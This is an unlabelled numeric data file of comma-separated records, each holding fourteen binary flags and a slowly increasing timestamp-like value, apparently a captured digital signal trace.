1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4429852e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4429876e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4429904e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4429928e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.4429956e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,3.4429980e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.4430004e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4430012e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4430028e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4430052e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4430076e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4430104e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4430128e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.4430156e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,3.4430180e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.4430204e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,3.4430228e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.4430252e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,3.4430276e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.4430304e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4430308e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4430328e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4430356e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4430380e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4430404e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4430428e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4430452e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.4430460e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,3.4430476e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.4430504e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,3.4430528e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.4430556e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,3.4430580e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.4430604e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,3.4430628e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.4430652e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4430660e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4430676e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4430704e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4430728e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.4430756e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,3.4430780e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.4430804e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4430812e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4430828e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4430852e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4430876e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4430904e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4430928e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4430956e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4430980e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4431004e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.4431008e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,3.4431028e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.4431052e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4431060e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4431076e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4431104e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4431156e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4431180e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4431228e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4431252e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4431304e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4431328e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4431380e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4431404e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4431452e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4431476e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4431532e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4431556e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4431580e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4431604e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4431628e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4431652e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.4431660e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,3.4431676e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.4431704e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,3.4431728e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.4431756e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,3.4431780e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.4431804e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,3.4431828e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.4431852e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,3.4431876e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.4431904e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4431908e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4431928e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4431956e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4431980e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4432004e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.4432008e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,3.4432028e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.4432052e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,3.4432076e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.4432104e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,3.4432128e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.4432156e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,3.4432180e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.4432204e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4432212e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4432228e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4432252e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4432276e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4432304e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4432328e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4432356e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4432380e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4432404e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.4432408e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,3.4432428e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.4432452e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,3.4432476e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.4432504e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,3.4432528e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.4432556e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4432560e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4432580e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4432604e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4432628e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4432652e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4432704e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4432728e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4432780e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4432804e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4432852e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4432876e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4432932e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4432956e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4433004e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4433028e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4433080e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4433104e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4433128e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4433156e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4433180e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4433204e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.4433208e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,3.4433228e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.4433252e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,3.4433276e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.4433304e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,3.4433328e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.4433356e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,3.4433380e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.4433404e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4433412e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4433428e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4433452e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4433476e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4433504e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4433528e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.4433556e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,3.4433580e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.4433604e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,3.4433628e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.4433652e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,3.4433676e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.4433700e-02 1,0,1,0,1,1,0,0,0,1,0,0,1,0,3.4433724e-02 1,0,1,0,1,1,0,0,0,1,0,0,0,0,3.4433752e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4433756e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4433776e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4433804e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4433828e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4433852e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4433900e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4433924e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4433976e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4434004e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4434052e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4434076e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4434124e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4434152e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4434204e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4434228e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4434276e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4434300e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4434324e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4434352e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4434376e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4434404e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4434428e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4434452e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4434476e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4434500e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4434524e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4434552e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4434576e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4434604e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4434628e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4434652e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4434676e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4434700e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4434724e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4434752e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4434776e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4434804e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4434828e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4434852e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4434876e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4434900e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4434924e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4434952e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4434976e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4435004e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4435028e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4435052e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4435076e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4435100e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4435124e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4435152e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4435176e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4435204e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4435228e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4435252e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4435276e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4435300e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4435324e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4435352e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4435376e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4435404e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4435428e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4435452e-02 1,0,1,0,1,0,0,0,0,0,0,0,1,0,3.4435476e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,0,3.4435500e-02 1,0,1,0,1,0,0,0,0,0,0,0,0,1,3.4560012e-02 0,0,1,0,1,0,0,0,0,0,0,0,0,1,3.4560180e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,1,3.4560200e-02 0,1,1,0,1,0,0,0,0,0,0,1,0,1,3.4560228e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,1,3.4560252e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,1,3.4560556e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,1,3.4560580e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,1,3.4560604e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,1,3.4560632e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,1,3.4560656e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,1,3.4560684e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,1,3.4560708e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,1,3.4560732e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,1,3.4560756e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,1,3.4560780e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,1,3.4560804e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,1,3.4560832e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4560844e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4560860e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4560884e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4560908e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4560932e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4560956e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4560980e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4561004e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4561032e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4561056e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4561084e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4561108e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4561132e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4561156e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4561180e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4561204e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4561228e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4561252e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4561276e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4561304e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4561328e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4561356e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4561380e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4561404e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4561428e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4561452e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4561476e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4561504e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4561528e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4561556e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4561580e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4561604e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4561628e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4561652e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4561676e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4561704e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4561728e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4561756e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4561780e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4561804e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4561828e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4561852e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4561876e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4561904e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4561928e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4561956e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4561980e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4562004e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4562028e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4562052e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4562076e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4562104e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4562128e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4562156e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4562180e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4562204e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4562228e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4562252e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4562276e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4562304e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4562328e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4562356e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4562380e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4562404e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4562428e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4562452e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4562476e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4562504e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4562528e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4562556e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4562580e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4562604e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4562628e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4562652e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4562676e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4562704e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4562728e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4562756e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4562780e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4562804e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4562828e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4562852e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4562876e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4562904e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4562928e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4562956e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4562980e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,3.4562984e-02 0,1,1,0,1,1,0,0,0,1,0,0,1,0,3.4563004e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,3.4563028e-02 0,1,1,0,1,1,0,0,0,1,0,0,1,0,3.4563052e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,3.4563076e-02 0,1,1,0,1,1,0,0,0,1,0,0,1,0,3.4563104e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,3.4563128e-02 0,1,1,0,1,1,0,0,0,1,0,0,1,0,3.4563156e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,3.4563180e-02 0,1,1,0,1,1,0,0,0,1,0,0,1,0,3.4563204e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,3.4563228e-02 0,1,1,0,1,1,0,0,0,1,0,0,1,0,3.4563252e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,3.4563276e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4563284e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4563304e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4563328e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4563356e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4563380e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4563404e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4563428e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4563452e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4563476e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4563504e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4563528e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4563556e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4563580e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4563604e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4563628e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4563652e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4563676e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4563700e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4563724e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4563752e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4563776e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4563804e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4563828e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4563852e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4563876e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4563900e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4563924e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4563952e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4563976e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4564004e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4564028e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4564052e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4564076e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4564100e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4564124e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4564152e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4564176e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4564204e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4564228e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4564252e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4564276e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4564300e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4564324e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4564352e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4564376e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,3.4564380e-02 0,1,1,0,1,1,0,0,0,1,0,0,1,0,3.4564404e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,3.4564428e-02 0,1,1,0,1,1,0,0,0,1,0,0,1,0,3.4564452e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,3.4564476e-02 0,1,1,0,1,1,0,0,0,1,0,0,1,0,3.4564500e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,3.4564524e-02 0,1,1,0,1,1,0,0,0,1,0,0,1,0,3.4564552e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,3.4564576e-02 0,1,1,0,1,1,0,0,0,1,0,0,1,0,3.4564604e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,3.4564628e-02 0,1,1,0,1,1,0,0,0,1,0,0,1,0,3.4564652e-02 0,1,1,0,1,1,0,0,0,1,0,0,0,0,3.4564676e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4564684e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4564700e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4564724e-02 0,1,1,0,1,0,0,0,0,0,0,0,1,0,3.4564752e-02 0,1,1,0,1,0,0,0,0,0,0,0,0,0,3.4564776e-02 